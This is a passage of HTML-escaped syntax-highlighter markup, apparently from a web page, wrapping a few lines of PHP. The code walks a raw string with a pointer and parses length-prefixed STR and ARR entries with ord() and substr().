font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-115&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-116&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;while&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;strlen&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-117&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;STR&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-118&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-119&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;ord&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-120&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-121&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$parsed&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$idx&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;substr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-122&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$length&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-123&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-124&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;elseif&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$rawData&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;ARR&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-125&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;			&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$pointer&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;++&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-126&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit 